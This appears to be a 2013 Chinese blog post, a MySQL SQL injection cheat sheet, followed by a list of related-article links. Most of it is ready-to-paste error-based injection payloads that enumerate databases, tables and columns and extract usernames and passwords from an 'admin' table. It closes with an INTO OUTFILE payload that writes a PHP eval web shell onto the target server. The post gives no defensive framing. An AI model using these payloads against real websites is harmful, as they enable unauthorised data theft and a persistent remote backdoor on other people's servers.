登录框注入 后台注入 limit注入 X-Forwarded-For 注入 Referer注入 mysql语句构造
2013-02-02 13:55
603 查看
语句模型:
爆出一些网站相关信息:
爆数据信息,相关函数:
system_user() 系统用户名
user() 用户名
current_user 当前用户名
session_user() 连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件的函数
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os 操作系统
information_schema.schemata 数据库名表
information_schema.tables 表名表
information_schema.columns 字段名
and(select 1 from(select count(*),concat((select concat(注入语句) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
爆出一些网站相关信息:
and (select 1 from(select count(*),concat((select concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a)>0
爆数据信息,相关函数:
system_user() 系统用户名
user() 用户名
current_user 当前用户名
session_user() 连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件的函数
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os 操作系统
information_schema.schemata 数据库名表
information_schema.tables 表名表
information_schema.columns 字段名
'and(select 1 from(select count(*),concat((select concat(相关函数1,0x20,相关函数2,0x20,......) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 2.爆表 'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=数据库的Hex limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=数据库的Hex limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=数据库的Hex limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' ....... 3.爆列 'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' ........ 4.爆用户和密码 'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' 'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and' ........ ' or 1 AND (SELECT id FROM the_users limit 1 INTO OUTFILE 'D:/sub/jw/safe1.php' lines terminated by '<?php eval($_POST[safe])?>') # |
相关文章推荐
- 攻击方法:谈php+mysql注入语句构造
- burp结合sqlmap进行后台登录框post注入
- mysql中的分页语句 limit
- 谈php+mysql注射语句构造
- sql语句中select top n与oracle的rownum与mysql的limit用法
- MySQL登录 ERROR 1045 (28000) Access denied for user 'root'@'localhost' (using password NO)问题
- 挖掘x-forwarded-for注入
- Mysql 分页语句Limit用法
- Linux终端登录MySQL问题:Access denied for user 'root'@'localhost'解决方法
- 低版本中mysql不支持在limit语句中有子查询
- mysql登录账号出错:ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
- mysql登录报错“Access denied for user 'root'@'localhost' (using password: YES”的处理方法
- mysql登录报错“Access denied for user 'root'@'localhost' (using password: YES”的处理方法
- MySQL学习笔记 第六讲:select语句order by、limit、distinct、union
- MySQL中执行sql语句错误 Error Code: 1093. You can't specify target table 'car' for update in FROM clause
- Android使用jsp+sevlet+mysql实现简单的前后台登录系统
- mysql登录出现:ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
- 【转】Mysql分页语句Limit用法
- MySQL查询优化:连接查询排序limit(join、order by、limit语句)
- mysql全局权限账户%登录不上ERROR 1045 (28000): Access denied for user 'mhz'@'localhost' (using password: YES)